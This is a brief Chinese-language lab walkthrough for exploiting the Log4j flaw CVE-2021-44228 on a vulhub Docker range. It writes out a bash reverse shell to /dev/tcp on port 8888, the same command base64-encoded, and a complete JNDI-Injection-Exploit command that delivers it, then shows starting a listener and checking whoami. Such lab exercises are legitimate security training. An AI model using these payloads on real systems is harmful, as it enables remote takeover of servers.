log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令

2.发现端口是8983,浏览器访问http://172.16.1.18:8983/

3.用dnslog平台检测dns回显,看看有没有漏洞存在

4.反弹shell到kali(ip为172.16.1.18)的8888端口

bash -i >& /dev/tcp/172.16.1.18/8888 0>&1

然后对上述命令进行base64编码,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=

最终 Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "172.16.1.18"

同时,我们开启对172.16.1.18:8888端口监听

输入whoami命令查看是否获得shell

相关推荐
sunnyday04263 小时前
深入理解Java日志框架:Logback与Log4j2配置对比分析
java·log4j·logback
亓才孓10 小时前
JUnit--Before,After,Test标签
java·junit·log4j
while(1){yan}2 天前
图书管理系统(超详细版)
spring boot·spring·java-ee·tomcat·log4j·maven·mybatis
Hello.Reader2 天前
PyFlink Table API 用户自定义函数(UDF)通用 UDF vs Pandas UDF、打包部署、open 预加载资源、读取作业参数、单元测试
log4j·pandas
Hello.Reader3 天前
PyFlink TableEnvironment 创建方式、核心 API、作业执行、UDF 与依赖、Catalog 管理与容错配置
log4j
风送雨4 天前
八周Python强化计划(八)
开发语言·python·log4j
_OP_CHEN4 天前
【测试理论与实践】(八)吃透测试分类(下):阶段 + 执行 + 组织 + 地域,测试全维度分类指南
自动化测试·软件测试·测试开发·安全·log4j·测试开发工程师·测试分类
小代码20167 天前
loki 环境搭建
spring boot·docker·log4j·grafana
企鹅侠客7 天前
第07章—实战应用篇:List命令详解与实战(下)
windows·redis·log4j·list
小肖爱笑不爱笑9 天前
Maven
java·log4j·maven